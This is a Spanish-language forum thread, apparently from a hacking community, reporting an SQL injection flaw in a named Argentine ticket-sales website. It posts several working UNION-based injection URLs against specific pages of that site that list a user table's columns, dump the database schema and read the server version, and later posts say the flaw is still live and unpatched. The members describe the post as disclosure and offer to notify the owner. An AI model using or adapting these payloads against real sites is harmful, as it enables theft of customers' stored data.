[ SQLi ] www.1000tickets.com.ar

****************************************************
   SQLi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
****************************************************

> Site: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

> Descripción del site: venta de entradas para conciertos y demás.



> Descripción de la vulnerabilidad:

  -Se encuentra un síntoma de vulnerabilidad frente a SQLi.
 
  -Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper





  -Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.

Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.

Método manual:





Payload:

http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--

Método automático con SQLHelper:



Vulnerabilidad reportada por la comunidad de Underc0de.

Autor: hati

http://www.1000tickets.com.ar/ficha.php
?id=-91 union select 1,(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!=0x696e666f726d6174696f6e5f736368656d61 and(@a)in (@a:=concat(@a,table_schema,0x203e20,table_name,0x3e,column_name,0x3c62723e))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, ¿podría recibir ayuda para comunicar la vulnerabilidad?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, ¿podría recibir ayuda para comunicar la vulnerabilidad?

Quieres reportarlo tu? o que lo haga la comunidad por ti?

Saludos.

Si es posible que la comunidad lo haga por mi lo agradecería @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, y también gracias a ti por responderme.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si es posible que la comunidad lo haga por mi lo agradecería @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, y también gracias a ti por responderme.

Excelente, nos encargamos entonces!

Saludos.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login gracias a ti a la comunidad de Underc0de

No se si revivir el post.

La vulnerabilidad sigue activa.

http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No se si revivir el post.

La vulnerabilidad sigue activa.

http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.

Si, nunca contestaron al correo y obviamente tampoco lo fixearon xD